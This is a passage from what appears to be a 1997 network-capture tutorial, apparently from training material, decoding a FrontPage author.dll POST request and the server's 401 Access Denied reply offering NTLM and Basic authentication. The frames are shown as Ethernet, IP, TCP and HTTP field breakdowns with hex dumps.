application/x-vermeer-rpc HTTP: Undocumented Header = X-Vermeer-Content-Type: application/x-vermeer-rpc HTTP: Undocumented Header Fieldname = X-Vermeer-Content-Type HTTP: Undocumented Header Value = application/x-vermeer-rpc HTTP: Data: Number of data bytes remaining = 62 (0x003E) 00000: 00 C0 4F C4 8C 93 00 C0 4F C4 8C 8F 08 00 45 00 ..O.....O.....E. 00010: 01 A3 B8 05 40 00 80 06 A2 96 CC 49 83 12 CC 49 ....@......I...I 00020: 83 13 04 74 00 50 00 0A C3 F5 00 3E CB BC 50 18 ...t.P.....>..P. 00030: 22 38 A8 FF 00 00 50 4F 53 54 20 2F 5F 76 74 69 "8....POST /_vti 00040: 5F 62 69 6E 2F 5F 76 74 69 5F 61 75 74 2F 61 75 _bin/_vti_aut/au 00050: 74 68 6F 72 2E 64 6C 6C 20 48 54 54 50 2F 31 2E thor.dll HTTP/1. 00060: 30 0D 0A 44 61 74 65 3A 20 4D 6F 6E 2C 20 30 31 0..Date: Mon, 01 00070: 20 44 65 63 20 31 39 39 37 20 32 33 3A 35 37 3A Dec 1997 23:57: 00080: 31 30 20 47 4D 54 0D 0A 4D 49 4D 45 2D 56 65 72 10 GMT..MIME-Ver 00090: 73 69 6F 6E 3A 20 31 2E 30 0D 0A 55 73 65 72 2D sion: 1.0..User- 000A0: 41 67 65 6E 74 3A 20 4D 53 46 72 6F 6E 74 50 61 Agent: MSFrontPa 000B0: 67 65 2F 33 2E 30 0D 0A 48 6F 73 74 3A 20 32 30 ge/3.0..Host: 20 000C0: 34 2E 37 33 2E 31 33 31 2E 31 39 0D 0A 41 63 63 4.73.131.19..Acc 000D0: 65 70 74 3A 20 61 75 74 68 2F 73 69 63 69 6C 79 ept: auth/sicily 000E0: 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 ..Content-Length 000F0: 3A 20 36 32 0D 0A 43 6F 6E 74 65 6E 74 2D 45 6E : 62..Content-En 00100: 63 6F 64 69 6E 67 3A 20 78 2D 76 65 72 6D 65 65 coding: x-vermee 00110: 72 2D 31 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 r-1..Content-Typ 00120: 65 3A 20 61 70 70 6C 69 63 61 74 69 6F 6E 2F 78 e: application/x 00130: 2D 76 65 72 6D 65 65 72 2D 72 70 63 0D 0A 58 2D -vermeer-rpc..X- 00140: 56 65 72 6D 65 65 72 2D 43 6F 6E 74 65 6E 74 2D Vermeer-Content- 00150: 54 79 70 65 3A 20 61 70 70 6C 69 63 61 74 69 6F Type: applicatio 00160: 6E 2F 78 2D 76 65 72 6D 65 65 72 2D 72 70 63 0D n/x-vermeer-rpc. 00170: 0A 0D 0A B0 32 7D ED 9D 1C A9 A8 B3 BB BC 12 39 ....2}.........9 00180: 84 F7 B3 9C 83 A4 CF 39 B7 B4 BC 23 05 A7 41 79 .......9...#..Ay 00190: 05 F8 45 78 01 FA 41 50 01 F8 47 D4 07 55 7D E3 ..Ex..AP..G..U}. 001A0: F8 C2 9F 0F B4 BC 23 B9 A9 F9 F7 FC A4 1B 79 28 ......#.......y( 001B0: B1 . If Windows NT Challenge/Response Security is enabled on the Web Server, each initial request to download a file, after establishing a TCP session, is responded to with an accesss denied HTTP frame: 23 30.859 STUDENT7 00C04FC48C8F HTTP Response (to client using port 1140) STUDENT7 204.73.131.18 IP FRAME: Base frame properties FRAME: Time of capture = Dec 1, 1997 17:56:55.392 FRAME: Time delta from previous physical frame: 0 milliseconds FRAME: Frame number: 23 FRAME: Total frame length: 224 bytes FRAME: Capture frame length: 224 bytes FRAME: Frame data: Number of data bytes remaining = 224 (0x00E0) ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol ETHERNET: Destination address : 00C04FC48C8F ETHERNET: .......0 = Individual address ETHERNET: ......0. = Universally administered address ETHERNET: Source address : 00C04FC48C93 ETHERNET: .......0 = No routing information present ETHERNET: ......0. = Universally administered address ETHERNET: Frame Length : 224 (0x00E0) ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol) ETHERNET: Ethernet Data: Number of data bytes remaining = 210 (0x00D2) IP: ID = 0xC126; Proto = TCP; Len: 210 IP: Version = 4 (0x4) IP: Header Length = 20 (0x14) IP: Service Type = 0 (0x0) IP: Precedence = Routine IP: ...0.... = Normal Delay IP: ....0... = Normal Throughput IP: .....0.. = Normal Reliability IP: Total Length = 210 (0xD2) IP: Identification = 49446 (0xC126) IP: Flags Summary = 2 (0x2) IP: .......0 = Last fragment in datagram IP: ......1. = Cannot fragment datagram IP: Fragment Offset = 0 (0x0) bytes IP: Time to Live = 128 (0x80) IP: Protocol = TCP - Transmission Control IP: Checksum = 0x9A46 IP: Source Address = 204.73.131.19 IP: Destination Address = 204.73.131.18 IP: Data: Number of data bytes remaining = 190 (0x00BE) TCP: .AP..., len: 170, seq: 4115388-4115557, ack: 705904, win: 8381, src: 80 dst: 1140 TCP: Source Port = Hypertext Transfer Protocol TCP: Destination Port = 0x0474 TCP: Sequence Number = 4115388 (0x3ECBBC) TCP: Acknowledgement Number = 705904 (0xAC570) TCP: Data Offset = 20 (0x14) TCP: Reserved = 0 (0x0000) TCP: Flags = 0x18 : .AP... TCP: ..0..... = No urgent data TCP: ...1.... = Acknowledgement field significant TCP: ....1... = Push function TCP: .....0.. = No Reset TCP: ......0. = No Synchronize TCP: .......0 = No Fin TCP: Window = 8381 (0x20BD) TCP: Checksum = 0xD958 TCP: Urgent Pointer = 0 (0x0) TCP: Data: Number of data bytes remaining = 170 (0x00AA) HTTP: Response (to client using port 1140) HTTP: Protocol Version = HTTP/1.0 HTTP: Status Code = Unauthorized HTTP: Reason = Access Denied HTTP: WWW-Authenticate = NTLM HTTP: WWW-Authenticate = Basic realm="204.73.131.19" HTTP: Content-Length = 24 HTTP: Content-Type = text/html HTTP: Data: Number of data bytes remaining = 24 (0x0018) 00000: 00 C0 4F C4 8C 8F 00 C0 4F C4 8C 93 08 00 45 00 ..O.....O.....E. 00010: 00 D2 C1 26 40 00 80 06 9A 46 CC 49 83 13 CC 49 ...&@....F.I...I 00020: 83 12 00 50 04 74 00 3E CB BC 00 0A C5 70 50 18 ...P.t.>.....pP. 00030: 20 BD D9 58 00 00 48 54 54 50 2F 31 2E 30 20 34 ..X..HTTP/1.0 4 00040: 30 31 20 41 63 63 65 73 73 20 44 65 6E 69 65 64 01 Access Denied 00050: 0D 0A 57 57 57 2D 41 75 74 68 65 6E 74 69 63 61 ..WWW-Authentica 00060: 74 65 3A 20 4E 54 4C 4D 0D 0A 57 57 57 2D 41 75 te: NTLM..WWW-Au 00070: 74 68 65 6E 74 69 63 61 74 65 3A 20 42 61 73 69 thenticate: Basi 00080: 63 20 72 65 61 6C 6D 3D 22 32 30 34 2E 37 33 2E c realm="204.73. 00090: 31 33 31 2E 31 39 22 0D 0A 43 6F 6E 74 65 6E 74 131.19"..Content 000A0: 2D 4C 65 6E 67 74 68 3A 20 32 34 0D 0A 43 6F 6E -Length: 24..Con 000B0: 74 65 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F tent-Type: text/ 000C0: 68 74 6D 6C 0D 0A 0D 0A 45 72 72 6F 72 3A 20 41 html....Error: A 000D0: 63 63 65 73 73 20 69 73 20 44 65 6E 69 65 64 2E ccess is Denied.